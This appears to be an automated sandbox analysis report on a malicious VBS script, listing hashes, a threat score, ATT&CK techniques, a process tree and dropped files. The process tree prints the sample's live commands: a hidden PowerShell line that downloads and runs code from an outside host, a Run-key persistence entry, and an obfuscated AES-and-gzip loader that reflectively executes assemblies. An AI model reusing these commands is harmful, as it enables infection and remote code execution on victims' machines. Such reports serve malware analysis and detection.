823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9

General

Target

823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9.vbs
Size

67KB
MD5

12d9b975c280a2500a1f13ee88cd5dcc
SHA1

d2ff34e43857aafc57217cfb7cdc5bb3b2825b66
SHA256

823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9
SHA512

ec0a70030c775ee18f5482e756e6b4abacdf0e14516335771a8995be7059eb037dc18c27d2844927fdde37b17cae9226f173ffda8334e764f478fe2181a31430
SSDEEP

1536:dha8UpBzancwZOnc9/FQa6vYGl2Yo7ZkeXeFuGbVSPXCAG:7Ur2Ocmo7ZkieFuyIG

Score

8^/10

execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2268	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftService = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat\""	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2268	powershell.exe
2612	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2116 wrote to memory of 2268	2116	WScript.exe	30
PID 2116 wrote to memory of 2268	2116	WScript.exe	30
PID 2116 wrote to memory of 2268	2116	WScript.exe	30
PID 2116 wrote to memory of 2012	2116	WScript.exe	33
PID 2116 wrote to memory of 2012	2116	WScript.exe	33
PID 2116 wrote to memory of 2012	2116	WScript.exe	33
PID 2012 wrote to memory of 2644	2012	cmd.exe	35
PID 2012 wrote to memory of 2644	2012	cmd.exe	35
PID 2012 wrote to memory of 2644	2012	cmd.exe	35
PID 2644 wrote to memory of 2592	2644	cmd.exe	37
PID 2644 wrote to memory of 2592	2644	cmd.exe	37
PID 2644 wrote to memory of 2592	2644	cmd.exe	37
PID 2644 wrote to memory of 2612	2644	cmd.exe	38
PID 2644 wrote to memory of 2612	2644	cmd.exe	38
PID 2644 wrote to memory of 2612	2644	cmd.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9.vbs"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2268
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\system.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\system.bat';$Qstz='SpzjXAlzjXAitzjXA'.Replace('zjXA', ''),'TfJIHranfJIHsffJIHofJIHrfJIHmFfJIHinafJIHlfJIHBlofJIHcfJIHkfJIH'.Replace('fJIH', ''),'RVgYzeadVgYzLiVgYznesVgYz'.Replace('VgYz', ''),'InMwMavoMwMakMwMaeMwMa'.Replace('MwMa', ''),'DecsNGQomsNGQpresNGQssNGQssNGQ'.Replace('sNGQ', ''),'CoHJBApyTHJBAoHJBA'.Replace('HJBA', ''),'CrXqfmeatXqfmeDeXqfmcryXqfmptXqfmorXqfm'.Replace('Xqfm', ''),'GeFjYVtFjYVCFjYVurFjYVrenFjYVtFjYVPrFjYVocFjYVesFjYVsFjYV'.Replace('FjYV', ''),'LozlYIazlYIdzlYI'.Replace('zlYI', ''),'CLJmzhLJmzanLJmzgeELJmzxtLJmzenLJmzsLJmzionLJmz'.Replace('LJmz', ''),'EeFjtleeFjtmeeFjtneFjttAeFjtteFjt'.Replace('eFjt', ''),'MdbpiaindbpiModbpiddbpiuledbpi'.Replace('dbpi', ''),'FrRYFzoRYFzmBRYFzaRYFzsRYFze6RYFz4RYFzSRYFztrRYFzinRYFzgRYFz'.Replace('RYFz', ''),'EncrkwtcrkwrcrkwyPocrkwicrkwntcrkw'.Replace('crkw', '');powershell -w hidden;function RgsAI($BWcmp){$GWmwK=[System.Security.Cryptography.Aes]::Create();$GWmwK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$GWmwK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$GWmwK.Key=[System.Convert]::($Qstz[12])('bVSs74+10Z+7ASHf34iR8A7lXdmOJD3coRGmA4lMt4I=');$GWmwK.IV=[System.Convert]::($Qstz[12])('iE6BirpwfNsKBuhzhqFgjw==');$OWgUJ=$GWmwK.($Qstz[6])();$MLceL=$OWgUJ.($Qstz[1])($BWcmp,0,$BWcmp.Length);$OWgUJ.Dispose();$GWmwK.Dispose();$MLceL;}function frMFN($BWcmp){$ssjuW=New-Object System.IO.MemoryStream(,$BWcmp);$upHUk=New-Object System.IO.MemoryStream;$WGXAI=New-Object System.IO.Compression.GZipStream($ssjuW,[IO.Compression.CompressionMode]::($Qstz[4]));$WGXAI.($Qstz[5])($upHUk);$WGXAI.Dispose();$ssjuW.Dispose();$upHUk.Dispose();$upHUk.ToArray();}$DXhXo=[System.IO.File]::($Qstz[2])([Console]::Title);$YYyyJ=frMFN (RgsAI ([Convert]::($Qstz[12])([System.Linq.Enumerable]::($Qstz[10])($DXhXo, 5).Substring(2))));$eqMxD=frMFN (RgsAI ([Convert]::($Qstz[12])([System.Linq.Enumerable]::($Qstz[10])($DXhXo, 6).Substring(2))));[System.Reflection.Assembly]::($Qstz[8])([byte[]]$eqMxD).($Qstz[13]).($Qstz[3])($null,$null);[System.Reflection.Assembly]::($Qstz[8])([byte[]]$YYyyJ).($Qstz[13]).($Qstz[3])($null,$null); "
      4⤵
      PID:2592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
66KB

MD5
63de01f12144baf2b505f8eea95ae3a9

SHA1
b1428ef307e63503219af46059b89fb60487f7c4

SHA256
32d96866203a868b1d4f28560239e66421b412cfa184a876485c39da56f3d979

SHA512
de86970f4eff4a449eaf2d992da255b020c6e384c97d02c3e05ea07bb2a67d543d1701c7beed9a23bb88d82097728ad6b4fb452ac48182b44a894a15bcf712d0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
76372ed03aad297ff878937d271cf394

SHA1
fe7783a52ec1118a803b33239a2878117536a8ba

SHA256
40fa3123cc8195b42043867810e9476748033caefafb1b4a8698f1f66590e562

SHA512
0cfbfa0f091ef03d7419e3dd568fb69eebbd289b1956811c4ccc84ffbb37044988641a76fd0ab8fa2d0296871afe01c0718aeef859635b573ba67301226e4409

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5XWGVJVE5FF1DR4617OU.temp

Filesize
7KB

MD5
b3df258ccfe0effb88d91638fd59408b

SHA1
b58b62d4c58925d79c510aa7cabf43d22995a760

SHA256
e8d25ab7a5a7a97176cbe45ac3eee8c62b5b8c7593171a57ef698683686cf37b

SHA512
3400081c3157dbbbf8de3bfdae4a20a329029e31b5b451d03959cb76061ad967805eeb1e44db45c5facaf3d70d4873640e9447271e99595402c997211d3b7423

Download Submit
memory/2268-7-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-8-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-11-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-10-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-9-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-4-0x000007FEF58BE000-0x000007FEF58BF000-memory.dmp

Filesize
4KB

Download
memory/2268-6-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2268-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2612-28-0x0000000000540000-0x0000000000548000-memory.dmp

Filesize
32KB

Download
memory/2612-27-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads